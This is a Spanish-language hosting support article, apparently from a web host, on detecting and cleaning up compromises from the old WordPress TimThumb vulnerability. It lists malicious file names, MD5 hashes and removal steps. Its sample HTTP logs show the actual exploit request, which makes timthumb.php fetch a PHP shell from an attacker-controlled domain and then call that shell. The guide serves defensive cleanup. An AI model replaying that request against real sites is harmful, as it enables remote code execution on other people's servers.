Vulnerabilidad de WordPress: TimThumb

TimThumb es una herramienta utilizada por los temas y complementos de WordPress para cambiar el tamaño de las imágenes. Las versiones antiguas de TimThumb tienen una vulnerabilidad de seguridad que permite a los atacantes cargar archivos maliciosos ("incorrectos") desde otro sitio web. El primer archivo incorrecto permite al atacante subir más archivos maliciosos a la cuenta de hosting.

Puedes obtener más información sobre vulnerabilidad y cómo ocuparte de ella en ¿Qué sucede si mi sitio web es pirateado?.

Señales de que has sido vulnerado

Además de las señales mencionadas en ¿Qué sucede si mi sitio web es pirateado?, puedes saber si tu sitio está afectado por esta vulnerabilidad específica si tu cuenta contiene archivos con los siguientes patrones en un directorio de complementos:

  • external_[md5 hash].php — por ejemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por ejemplo: 7eebe45bde5168488ac4010f0d65cea8.php

Puedes encontrar ejemplos de posibles hashes md5 en la sección MD5SUMS de archivos maliciosos conocidos en este artículo.

También puedes encontrar los siguientes archivos en el directorio raíz de tu sitio web (más información):

  • x.txt
  • logx.txt

Recursos

Debes quitar todos los archivos vulnerados y expuestos. Antes de eliminar algo, recomendamos hacer una copia de seguridad de tu sitio web (más información).

Ubicación de archivos incorrectos

Los archivos incorrectos que se cargan inicialmente a través de la vulnerabilidad de TimThumb por lo general se ubicarán en uno de los siguientes directorios, que están en el directorio /tema o /complemento que contenga el archivo TimThumb vulnerable.

  • /tmp
  • /cache
  • /imágenes

Ejemplos de ubicaciones de archivos incorrectos:

[webroot]/wp-content/themes/[tema con TimThumb vulnerable]/cache/images/

Ejemplos de nombres de archivos incorrectos en estas ubicaciones:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Los archivos x.txt y logx.txt contendrán información sobre cuándo se creó un archivo incorrecto utilizando la vulnerabilidad de TimThumb y la ubicación de este archivo dentro de la cuenta de hosting. Esta información es útil para determinar qué archivos necesitan quitarse y dónde encontrarlos. Sin embargo, no es probable que esto proporcione una lista completa de los archivos que deben quitarse.

Un ejemplo:

Día: Mar, 11 Abr 2013 06:21:15 -0700
IP: X.X.X.X
Navegador: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema con TimThumb vulnerable]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Archivos para eliminar

Después de que has creado una copia de seguridad del sitio, elimina los siguientes archivos:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — por ejemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por ejemplo: 7eebe45bde5168488ac4010f0d65cea8.php
  • Otros archivos PHP maliciosos encontrados con los archivos nombrados md5 hash.

Puedes hacer esto a través de FTP (más información) o mediante el administrador de archivos en el panel de control de tu cuenta de hosting (más información).

También debes:

  • Actualizar todos tus temas y complementos a la última versión.
  • Reemplazar cualquier instancia de TimThumb.php con la versión más reciente que se puede encontrar aquí.

Información técnica

Muestra de registros HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerable]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMAS de archivos maliciosos conocidos

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Archivos maliciosos adicionales

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

¿Este artículo fue útil?
Gracias por tus comentarios. Para hablar con un representante de servicio al cliente, usa el número de teléfono de asistencia técnica o la opción de chat que aparece más arriba.
¡Nos complace haber ayudado! ¿Hay algo más que podamos hacer por ti?
Lo sentimos. Cuéntanos lo que te resultaba confuso o por qué la solución no resolvió tu problema.